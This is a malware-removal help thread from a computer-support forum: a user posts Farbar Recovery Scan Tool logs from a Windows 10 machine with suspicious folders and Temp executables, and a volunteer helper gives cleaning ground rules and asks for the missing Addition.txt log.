2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:54 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:41 - 03594240 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:31 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 01498112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 01:25 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:26 - 12587520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-29 10:48 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\e16f6b56-0817-0
2016-02-29 10:43 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\e16f6b56-53e7-0
2016-02-29 10:43 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\67322837
2016-02-29 10:43 - 2016-02-29 10:43 - 00003890 _____ C:\WINDOWS\System32\Tasks\{D1996BD7-8FB6-7614-566B-6FE1DB83922B}
2016-02-29 10:43 - 2016-02-29 10:43 - 00000000 ____D C:\ProgramData\{0b294307-012c-1}
2016-02-29 10:43 - 2016-02-29 10:43 - 00000000 ____D C:\ProgramData\{09b42448-312c-0}
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-02-17 19:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-27 00:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-09 13:01 - 2016-01-27 00:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 17:33 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-08 17:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-08 16:57 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-08 16:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 15:31 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-07 17:04 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-07 17:01 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:45 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 13:43 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-01 13:41 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-01 13:40 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:38 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-01 13:37 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-01 13:37 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-01 13:35 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 13:06 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2015-12-18 17:44 - 00000000 ____D C:\Program Files\Phrase Professor191220150009
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-29 10:43 - 2015-12-18 17:46 - 00000000 ____D C:\ProgramData\1e908d04-5b25-1
2016-02-29 10:43 - 2015-12-18 17:46 - 00000000 ____D C:\ProgramData\1e908d04-21f7-0
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-22 18:32 - 2014-07-07 11:35 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 14:03 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-09 13:57 - 2013-09-16 08:59 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\Maint000.exe
C:\Users\levilaing\AppData\Local\Temp\Maint001.exe
C:\Users\levilaing\AppData\Local\Temp\Maint002.exe

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

#2
pystryker

Posted 08 March 2016 - 07:08 PM

Trusted Helper

Malware Removal
3,912 posts

Hello and welcome to Geeks To Go! My nickname is Pystryker

, and I will be helping you with your issue today.

Before we get started, I have a few things I need to go over with you

If you are receiving help for this issue at another forum, please let me know so I can close this thread.
Please download to and run all requested tools from your Desktop.
Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way.

Now, let's get started, shall we? :thumbsup:

Hello

There was a second log produced called Addition.txt during the initial run of FRSTand it can be found here: C:\Users\levilaing\Downloads\Addition.txt . Please post that log for my review.

I'm currently analyzing your FRST log and preparing a fix. :thumbsup:

Things I need to see in your next post:

Addition.txt Log

#3
LLL31

Posted 08 March 2016 - 08:12 PM

Member

Topic Starter
Member
15 posts

I ran the program more than once because I thought I did it wrong, so I erased the addition.txt log. Is there anyway to retrieve it?

#4
LLL31

Posted 08 March 2016 - 08:18 PM

Member

Topic Starter
Member
15 posts

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-08 16:37:02)
Running from C:\Users\levilaing\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
BitTorrent (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\BitTorrent) (Version: 7.9.5.41163 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.6.0.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
